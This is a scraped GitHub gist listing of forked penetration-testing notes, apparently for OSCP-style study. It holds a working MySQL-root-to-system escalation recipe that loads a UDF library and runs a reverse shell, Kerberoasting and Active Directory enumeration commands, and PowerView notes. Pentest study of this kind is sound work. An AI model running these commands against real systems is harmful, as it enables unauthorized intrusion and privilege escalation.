Note: I did not author this, i found it somehwere.
- Tools
- Most common paths to AD compromise
- [GPO - Pivoting with Local Admin
Rahmi YILDIZ rahmiy
rahmiy
/ mysql_root_to_system_root
Created
August 14, 2021 23:58
— forked from p0c/mysql_root_to_system_root
#pentest #recipe: mysql root -> system root (linux)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # download lib_mysqludf_sys.so from https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql | |
| # (currently not present in kali's sqlmap, only the windows one, the same for metasploit...) | |
| mysql> use mysql; | |
| mysql> create table test(line blob); | |
| mysql> insert into test values(load_file('/tmp/lib_mysqludf_sys.so')); | |
| mysql> select * from test into dumpfile '/usr/lib/lib_mysqludf_sys.so'; | |
| mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; | |
| mysql> select sys_exec('./reverse_shell &'); |
rahmiy
/ PowerView-3.0-tricks.ps1
Created
November 17, 2022 14:31
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
rahmiy
/ kerberos attacks
Created
November 20, 2022 10:41
— forked from cyberheartmi9/kerberos attacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ======================================================================================================================== | |
| Kerberos Attacks | |
| ======================================================================================================================== | |
| [+] Kerbose attack | |
| ./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin |
rahmiy
/ Red-Team-notes
Created
November 20, 2022 10:46
— forked from cyberheartmi9/Red-Team-notes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enumeration | |
| # Credential Injection | |
| runas.exe /netonly /user:<domain>\<username> cmd.exe | |
| # enumeration users | |
| users | |
| net user /domain |
rahmiy
/ Active Directory Attacks.md
Created
November 20, 2022 10:51
— forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
rahmiy
/ oscp_prep.md
Created
January 7, 2024 13:40
— forked from AvasDream/oscp_prep.md
Resource for OSCP like HTB Boxes with Ippsec Videos and Writeups.
OlderNewer